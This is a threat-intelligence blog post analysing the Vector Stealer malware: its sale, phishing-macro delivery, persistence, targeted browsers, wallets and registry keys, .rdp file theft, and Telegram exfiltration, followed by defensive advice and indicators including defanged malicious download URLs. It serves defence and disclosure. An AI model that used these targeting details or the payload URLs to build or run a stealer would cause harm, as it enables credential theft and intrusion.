Cyble – Vector Stealer: A Gateway For Rdp Hijacking
Category

Evasive Malware Targeting Remote Desktop Files

Information stealers are malware designed to steal sensitive information from infected computers, such as login credentials, financial data, and personal information. They typically do this by searching for specific types of files and data on the infected computer and then exfiltrating that information to a remote server controlled by the attackers.

Cyble Research and Intelligence Labs (CRIL) spotted a malware named ‘Vector Stealer’, capable of stealing .rdp files. Stealing RDP files can enable TAs (Threat Actors) to perform RDP hijacking as these files contain details about the RDP session, including information needed for remote access.

RDP hijacking enables TAs to gain unauthorized remote access to a victim’s system without credentials, allows for lateral movement, and creates opportunities for additional attacks.

VectorStealer surfaced in cybercrime forums in the second half of 2022. The Threat Actor (TA) behind this stealer mainly operates through a web panel and a Telegram channel.

The figure below shows the web panel of VectorStealer.

Figure 1 VectorStealer Web Panel
Figure 1 – VectorStealer Web Panel

The TA has claimed the following on their web panel:

“The VectorStealer can recover sensitive information from all major browsers, including Firefox, Chrome, and Safari. It can also steal Discord tokens and sensitive files and gather basic information about the infected computer.”

This stealer payload is sold for USD 63 in BitCoin.

The figure below shows the payment details.  

Figure 2 VectorStealer Subscription
Figure 2 – VectorStealer Subscription

The stealer payload can be generated using the web panel. This web panel allows an attacker to create custom malware without having advanced programming skills.

Such web panels typically have a user-friendly interface and provide various options for customization, such as the ability to specify what actions the malware will perform and configure the malware’s behavior. This stealer can exfiltrate the sensitive information stolen from the victim’s system using SMTP, Discord, and Telegram.

The figure below shows the builder options.

Figure 3 VectorStealer Builder
Figure 3 – VectorStealer Builder

Interestingly, on the same web panel, the TA is advertising KGB crypter and claims that this crypter can kill multiple antivirus solutions. The figure below shows the section of the KGB crypter presented on the VectorStealer panel.

Figure 4 KGB Crypter Recommended on VectorStealer Panel
Figure 4 – KGB Crypter recommended on VectorStealer Panel

Crypters are a tool used by threat actors (TAs) to evade detection by encrypting the malware code, making it difficult for antivirus software to identify and remove it.

The TAs behind the KGB Crypter use their own website to provide the service and claims that it is compatible with .Net and C++-based binaries. They also claim that multiple prominent malware families, such as Redline, Quasar RAT, Venom RAT, and Pandora RAT, are already using this crypter.  

Figure 5 KGB Crypter Web Panel
Figure 5 – KGB Crypter Web Panel

The creators of KGB Crypter claim to be of Russian origin and boast that over 1,000 users have registered on their site, indicating its popularity among TAs. The crypter is offered as a paid service for USD 145 per month. It is equipped with a metamorphic generator, which alters the code each time it is compiled, making it more challenging for antivirus software to detect.

Figure 6 KGB Crypter Builder
Figure 6 – KGB Crypter Builder

Technical Analysis

Initial Infection

CRIL found a phishing email that was spreading vector stealer. This phishing email is themed around spare parts with an attachment named “POM-8501” and pretends to be coming from a supplier.

The Malicious Document (MalDoc) attachment in the spam email is shown below.

Figure 7 Phishing Mail Spreading VectorStealer
Figure 7 – Phishing Mail Spreading VectorStealer

When the MalDoc attachment is opened, it prompts the user to enable the macro. Enabling macros would trigger the execution of malicious activities on the victim’s computer. The image below shows the malicious document (MalDoc).

Figure 8 MalDoc
Figure 8 – MalDoc

Upon analyzing the MalDoc, we found that one of the OLE streams contains a VBA macro. Upon execution, the macro code de-obfuscates a PowerShell script and executes it using the Shell() function. The PowerShell script contains code to download the next stage payload from a remote server, save it as “ks.exe”, and executes it as shown below.

Figure 9 Macro Executes PowerShell Script
Figure 9 – Macro Executing PowerShell Script

Payload Execution

The stealer binary (SHA256: ca03561b59f1ba61afadfb577241e8c4f6ba56c7912ea62b6db9fb32a52b36bb) downloaded and executed by MalDoc is a 32-Bit .NET-based executable.

The figure below shows the file details.

Figure 10 File Details
Figure 10 – File Details

Persistence

Upon execution, the stealer creates a copy of itself into the %appdata% location and creates a task scheduler to establish persistence, as shown below.

Figure 11 Persistence Through Task Scheduler
Figure 11 – Persistence Through Task Scheduler

After this, it spawns a new process that loads the next level payload that uses KoiVM. KoiVM is a virtualizing protector for .NET applications and is made to work with ConfuserEx. The KoiVM is designed to change the .NET opcodes into new ones that only a virtualizing agent can understand.

The figure below shows the Koi stream present in MetaData.

Figure 12 – Koi Stream
Figure 12 – Koi Stream

The KoiVM further loads the VectorStealer and starts performing the stealer activities. Upon analyzing the memory dumps, we found that VectorStealer targets applications such as

  • Mail Clients: Outlook, ThunderBird, FoxMail
  • Chat Applications: Discord, Telegram,
  • Browsers: Opera, Vivaldi, Yandex, Brave, Chromium, Aloha Browser, Comodo Dragon, MapleStudio, ChromePlus, 360Browser, 7Star, CocCoc, Mozilla Firefox, Google Chrome.
  • Cold Crypto Wallets: Exodus, Electrum

VectorStealer also queries the Registry keys of a few applications to steal the credentials.

The table below shows the registry keys queried by the Stealer for collecting victims’ sensitive information.

Targeted Application Registry Key Description
Outlook HKEY_CURRENT_USERSoftwareMicrosoftOffice16.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A6676   HKEY_CURRENT_USERSoftwareMicrosoftOffice15.0OutlookProfilesOutlook9375CFF0413111d3B88A00104B2A6676   HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesOutlook9375CFF0413111d3B88A00104B2A6676   HKEY_CURRENT_USERSoftwareMicrosoftWindows Messaging SubsystemProfiles9375CFF0413111d3B88A00104B2A6676   Registry Keys Stores passwords of Email, HTTP, SMTP, IMAP, and POP3.  
Foxmail SOFTWAREClassesFoxmail.url.mailtoShellopencommand To get the FoxMail’s installation directory.

File Grabber

The stealer now grabs important sensitive files from the victim’s machine. Interestingly, this stealer also grabs .rdp files. Stealing .rdp files can also enable TAs to perform RDP (Remote Desktop Protocol) hijacking, as they contain information related to the RDP session.

The figure below shows the stealer enumerating a directory for grabbing files with extensions such as .txt, .doc, .docx, .pdf, and .rdp.

Figure 13 Targeted File Types
Figure 13 – Targeted File Types

Finally, the stealer creates a folder in the AppDataLocalTemp directory. This folder contains multiple sub-folders that will store stolen data from respective applications.

The figure below shows the folders created by the stealer.

Figure 14 Creates Folder in Temp Directory
Figure 14 – Creating Folder in Temp Directory

After collecting all the stolen data, it compresses the folder into a zip archive. The archive can then be exfiltrated using SMTP, Discord webhooks, or Telegram API. In this case, the stealer uses Telegram for exfiltration. It first sends a chat message to a Telegram bot controlled by TA. This message contains details of the victim’s system, including Username, Machine name, Operating System, IP address, and antivirus product.

To identify the antivirus product installed, it uses the WMI query, “SELECT * FROM AntiVirusProduct”. This stealer sends a GET request to “hxxps://ipinfo.io/ip” to fetch the victim’s IP address.

The figure below shows the contents of the chat message.

Figure 15 Telegram Chat Message
Figure 15 – Telegram Chat Message

This stealer establishes a successful internet connection before interacting with any remote servers. It terminates itself if it fails to establish a connection. After successfully sending this chat message, it sends the zip file which contains the stolen data to the Telegram bot.

The figure below shows the POST request made by VectorStealer.

Figure 16 Exfiltrates Data using POST Request
Figure 16 – Exfiltrating Data using a POST Request

Conclusion

We believe that the TAs behind VectorStealer and KGB crypter is in some sort of association. The VectorStealer uses an unknown crypter and uses KoiVM for virtualization. Like other stealers, it targets browsers, email clients, crypto wallets, and chat applications.

VectorStealer specifically targets .rdp files and steals them, suggesting a potential interest in RDP hijacking to gain access to victims’ networks. TAs can leverage RDP files to carry out numerous attacks, including ransomware attacks.

Our Recommendations

​​We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the suggestions given below:  

​ 

  • ​ Avoid downloading pirated software from warez/torrent websites. The “Hack Tool” present on sites such as YouTube, torrent sites, etc.,  typically contains such malware.   
  • Use strong passwords and enforce multi-factor authentication wherever possible.    
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.   
  • Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.   
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity.    
  • Educate employees on protecting themselves from threats like phishing/untrusted URLs.   
  • Block URLs that could be used to spread the malware, e.g., Torrent/Warez.   
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs.

MITRE ATT&CK® Techniques

 

​Tactic  ​Technique ID  ​Technique Name 
​Initial Access  ​T1566  ​Phishing 
​Execution  ​T1204  ​User Execution 
​Credential Access  ​T1555 
​T1539  ​
T1552 
​Credentials from Password Stores  ​
Steal Web Session Cookies  ​
Unsecured Credentials 
​Discovery  ​T1087 
​T1518  ​
T1057 
​T1124  ​
T1007 
​T1614 
​Account Discovery 
​Software Discovery  ​
Process Discovery  ​
System Time Discovery 
​System Service Discovery  ​
System Location Discovery 
​Command and Control  ​T1071 ​Application Layer Protocol
​Exfiltration  ​T1041  ​Exfiltration Over C&C Channel  ​ 

Indicators of Compromise (IoCs):   ​ 

​Indicators ​Indicator type ​Description
hxxp[:]//185.246.220[.]65/2×2/img-078-410-00[.]exe hxxp[:]//185.246.220[.]65/2×2/PCqcxNVzIHq2raQ.exe ​URL  ​Malicious URL 
a6280d3f50d1b373d5fa5f45247ac08b
421569147d9734ed3a9277bd3fbeacd42f1552ca
2b3aaa175f97c142679b9d9e7e9b9a2b2d85bf3990b1f9276f0dc79b0aaab06e
​MD5
SHA1
SHA256
​VectorStealer Loader 
939d6f6dd06eb826b27eda72f2ebe9c2
2ca7b12d8473867b6667a463aec7588a41ef9803
ca03561b59f1ba61afadfb577241e8c4f6ba56c7912ea62b6db9fb32a52b36bb
MD5
SHA1
SHA256
VectorStealer Loader 
ff06e0ddf65aafa2eb9a12fe38efbeb5
a2148b40c7dc3c5a198881ac403c98c9650b4374
b2d0305532b6f08f041cd109be667486c4a80deedb1394daad1e880a1d9a09d5
MD5
SHA1
SHA256
VectorStealer Payload
c859df0fe0665a8e4dc4047260b22ff5
1582f28572a3a0e025720f2b9663ff4c1198131a
e1f8409d4599e86b42a8ac71c67b69b4d129509b6d9e3c06a668fecf71c768b8
MD5
SHA1
SHA256
VectorStealer Payload

Source: https://blog.cyble.com/2023/02/01/vector-stealer-a-gateway-for-rdp-hijacking/